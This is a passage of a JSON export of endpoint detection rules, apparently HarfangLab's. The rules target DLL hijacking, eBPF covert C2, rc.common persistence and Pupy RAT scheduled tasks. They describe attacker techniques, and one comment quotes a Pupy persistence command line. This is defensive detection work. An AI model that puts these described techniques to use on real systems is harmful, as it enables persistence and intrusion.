"rule_description": "Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\nMalicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\nIt is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\nThis rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\n", "rule_creation_date": "2023-11-20", "rule_modified_date": "2025-10-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1505.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0aede467-048c-4d8e-887a-5d4afe2b47d8", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.586945Z", "creation_date": "2026-03-23T11:45:34.586949Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.586966Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_netsh.yml", "content": "title: DLL Hijacking via netsh.exe\nid: 0aede467-048c-4d8e-887a-5d4afe2b47d8\ndescription: |\n Detects potential Windows DLL Hijacking via netsh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'netsh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\AUTHFWCFG.DLL'\n - '\\Cabinet.dll'\n - '\\CRYPTBASE.DLL'\n - '\\DHCPCMONITOR.DLL'\n - '\\dhcpcsvc6.DLL'\n - '\\dhcpcsvc.DLL'\n - '\\DNSAPI.dll'\n - '\\dot3api.dll'\n - '\\DOT3CFG.DLL'\n - '\\eappcfg.dll'\n - '\\eappprxy.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\FWCFG.DLL'\n - '\\FWPolicyIOMgr.dll'\n - '\\fwpuclnt.dll'\n - '\\HNETMON.DLL'\n - '\\HTTPAPI.dll'\n - '\\IFMON.DLL'\n - '\\IPHLPAPI.DLL'\n - '\\ktmw32.dll'\n - '\\mintdh.dll'\n - '\\MobileNetworking.dll'\n - '\\NDFAPI.DLL'\n - '\\NETIOHLP.DLL'\n - '\\netshell.dll'\n - '\\NETTRACE.DLL'\n - '\\nlaapi.dll'\n - '\\NSHHTTP.DLL'\n - '\\NSHIPSEC.DLL'\n - '\\NSHWFP.DLL'\n - '\\OneX.DLL'\n - '\\P2P.dll'\n - '\\P2PNETSH.DLL'\n - '\\PEERDISTSH.DLL'\n - '\\POLSTORE.DLL'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\RASMONTR.DLL'\n - '\\RMCLIENT.dll'\n - '\\RPCNSH.DLL'\n - '\\SLC.dll'\n - '\\sppc.dll'\n - '\\SspiCli.dll'\n - '\\USERENV.dll'\n - '\\wcmapi.dll'\n - '\\WCNNETSH.DLL'\n - '\\wdi.dll'\n - '\\wevtapi.dll'\n - '\\WHHELPER.DLL'\n - '\\WINHTTP.dll'\n - '\\WINIPSEC.DLL'\n - '\\WINNSI.DLL'\n - '\\wlanapi.dll'\n - '\\WLANCFG.DLL'\n - '\\WSHELPER.DLL'\n - '\\WWANCFG.DLL'\n - '\\wwapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0aede467-048c-4d8e-887a-5d4afe2b47d8", "rule_name": "DLL Hijacking via netsh.exe", "rule_description": "Detects potential Windows DLL Hijacking via netsh.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079690Z", "creation_date": "2026-03-23T11:45:34.079692Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079697Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://blog.talosintelligence.com/mustang-panda-targets-europe/", "https://attack.mitre.org/techniques/T1036/005/" ], "name": "t1036_005_dll_load_from_user_public_libraries.yml", "content": "title: DLL Loaded from Libraries Folder\nid: 0b84fa6b-6d3b-4041-972c-ee8b193fa745\ndescription: |\n Detects the suspicious loading of a DLL from the libraries folder of the Public user.\n This folder is an uncommon directory for a DLL to load from and is often abused by attackers.\n It is recommended to analyze the loaded DLL to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/03/06\nmodified: 2025/01/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0b84fa6b-6d3b-4041-972c-ee8b193fa745", "rule_name": "DLL Loaded from Libraries Folder", "rule_description": "Detects the suspicious loading of a DLL from the libraries folder of the Public user.\nThis folder is an uncommon directory for a DLL to load from and is often abused by attackers.\nIt is recommended to analyze the loaded DLL to look for malicious behavior or content.\n", "rule_creation_date": "2024-03-06", "rule_modified_date": "2025-01-29", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1036.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0b99a008-58ed-40da-bc7d-43120837aaaf", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.620148Z", "creation_date": "2026-03-23T11:45:34.620150Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.620154Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf", "https://redcanary.com/blog/threat-detection/ebpf-malware/", "https://github.com/h3xduck/TripleCross", "https://attack.mitre.org/techniques/T1205/002/" ], "name": "t1205_002_possible_ebpf_covert_c2.yml", "content": "title: Possible Extended BPF Covert C2\nid: 0b99a008-58ed-40da-bc7d-43120837aaaf\ndescription: |\n Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\n A malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\n When a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\n A TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\n Together, these components create a covert communication channel without generating visible network activity.\n It is recommended to check the process which loaded the eBPF program for suspicious activities.\nreferences:\n - https://www.synacktiv.com/publications/linkpro-analyse-dun-rootkit-ebpf\n - https://redcanary.com/blog/threat-detection/ebpf-malware/\n - https://github.com/h3xduck/TripleCross\n - https://attack.mitre.org/techniques/T1205/002/\ndate: 2025/11/13\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.defense_evasion\n - attack.t1205.002\n - attack.t1205.001\n - classification.Linux.Source.Bpf\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n product: linux\n category: bpf_event\ndetection:\n selection:\n Kind: 'ebpf_load'\n ProgramTypeStr:\n - 'BPF_PROG_TYPE_XDP'\n - 'BPF_PROG_TYPE_SCHED_CLS'\n Image: '*'\n\n filter_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim'\n - '|/usr/libexec/crio/conmon'\n - '|/usr/bin/containerd'\n - '|/usr/bin/lxc-start'\n\n filter_edr:\n Image:\n - '/opt/hurukai-agent/bin/hurukai'\n - '/opt/CrowdStrike/falcon-sensor-bpf*'\n\n filter_cilium:\n Image: '/usr/bin/cilium-agent'\n\n filter_network_tools:\n Image:\n - '*/*bin/kxdpgun'\n - '*/bin/netbird'\n - '*/*bin/xdp-dns'\n - '*/bin/tc'\n\n filter_bpf_tools:\n Image: '*/bin/bpftool'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0b99a008-58ed-40da-bc7d-43120837aaaf", "rule_name": "Possible Extended BPF Covert C2", "rule_description": "Detects a Traffic Control (TC) or eXpress Data Path (XDP) eBPF program loaded.\nA malware can misuse eBPF by installing XDP programs to intercept network packets at a very early stage and detect hidden command messages.\nWhen a specific packet arrives, the XDP program can modify it so it looks like legitimate traffic, such as a normal HTTP request.\nA TC program on the egress path can similarly alter outgoing responses to embed data the malware sends back to its controller.\nTogether, these components create a covert communication channel without generating visible network activity.\nIt is recommended to check the process which loaded the eBPF program for suspicious activities.\n", "rule_creation_date": "2025-11-13", "rule_modified_date": "2026-01-22", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1205.001", "attack.t1205.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.600433Z", "creation_date": "2026-03-23T11:45:34.600436Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.600444Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_proquota.yml", "content": "title: DLL Hijacking via proquota.exe\nid: 0b9f13f2-fe2b-43fe-9f82-22ab533221ff\ndescription: |\n Detects potential Windows DLL Hijacking via proquota.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'proquota.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\userenv.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0b9f13f2-fe2b-43fe-9f82-22ab533221ff", "rule_name": "DLL Hijacking via proquota.exe", "rule_description": "Detects potential Windows DLL Hijacking via proquota.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0baf276d-d629-4eb2-948c-1b0f87b13160", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.590863Z", "creation_date": "2026-03-23T11:45:34.590867Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.590901Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_easinvoker.yml", "content": "title: DLL Hijacking via easinvoker.exe\nid: 0baf276d-d629-4eb2-948c-1b0f87b13160\ndescription: |\n Detects potential Windows DLL Hijacking via easinvoker.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easinvoker.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\SAMLIB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0baf276d-d629-4eb2-948c-1b0f87b13160", "rule_name": "DLL Hijacking via easinvoker.exe", "rule_description": "Detects potential Windows DLL Hijacking via easinvoker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612097Z", "creation_date": "2026-03-23T11:45:34.612101Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612108Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon", "https://attack.mitre.org/techniques/T1037/004/" ], "name": "t1037_004_rc_common_modified_linux.yml", "content": "title: RC Script /etc/rc.common Modified\nid: 0bc4d271-7029-4c83-bad4-a9ea34b7213b\ndescription: |\n Detects an attempt to modify the RC script /etc/rc.common.\n The /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to this file.\n It is recommended to investigate the process that read the `rc.common` file for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md#atomic-test-2---rccommon\n - https://attack.mitre.org/techniques/T1037/004/\ndate: 2022/12/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1037.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/rc.common'\n - TargetPath: '/etc/rc.common'\n\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0bc4d271-7029-4c83-bad4-a9ea34b7213b", "rule_name": "RC Script /etc/rc.common Modified", "rule_description": "Detects an attempt to modify the RC script /etc/rc.common.\nThe /etc/rc.common file is a script that is used to perform system-level tasks during the boot process on Unix-like systems.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to this file.\nIt is recommended to investigate the process that read the `rc.common` file for suspicious activities.\n", "rule_creation_date": "2022-12-26", "rule_modified_date": "2025-04-14", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1037.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0c371a93-177d-4ced-82ad-dc148a365686", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.083926Z", "creation_date": "2026-03-23T11:45:34.083928Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.083932Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/n1nj4sec/pupy", "https://attack.mitre.org/techniques/T1053/005/" ], "name": "t1053_005_pupy_scheduled_task.yml", "content": "title: Pupy Scheduled Task Persistence Added\nid: 0c371a93-177d-4ced-82ad-dc148a365686\ndescription: |\n Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\n Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\n It is recommended to download and investigate the 'elevator.xml' file.\n It is also recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://github.com/n1nj4sec/pupy\n - https://attack.mitre.org/techniques/T1053/005/\ndate: 2021/02/08\nmodified: 2025/08/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Pupy\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\schtasks.exe'\n # \"C:\\Windows\\System32\\schtasks.exe\" /create /xml c:\\users\\user\\appdata\\local\\temp\\elevator.xml /tn elevator\n CommandLine|contains|all:\n - '/create '\n - '/xml '\n - '/tn elevator'\n - '\\AppData\\Local\\Temp\\elevator.xml'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0c371a93-177d-4ced-82ad-dc148a365686", "rule_name": "Pupy Scheduled Task Persistence Added", "rule_description": "Detects a suspicious scheduled task creation that is related to Pupy Attack Framework.\nPupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in Python.\nIt is recommended to download and investigate the 'elevator.xml' file.\nIt is also recommended to investigate the parent process for suspicious activities.\n", "rule_creation_date": "2021-02-08", "rule_modified_date": "2025-08-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0c391c25-0ca4-4a33-a98e-d0de4cc1eee6", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.084746Z", "creation_date": "2026-03-23T11:45:34.084748Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.084752Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://twitter.com/RedDrip7/status/1545245625662418945", "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_version.yml", "content": "title: DLL Hijacking of VERSION.DLL\nid: 0c391c25-0ca4-4a33-a98e-d0de4cc1eee6\ndescription: |\n Detects a potential Windows DLL search order hijacking of VERSION.DLL.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/RedDrip7/status/1545245625662418945\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/10/21\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ImageLoaded|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_windows_sandbox:\n ImageLoaded|startswith: '\\Device\\vmsmb\\VSMB-'\n Imphash: '00000000000000000000000000000000' # mean we didn't 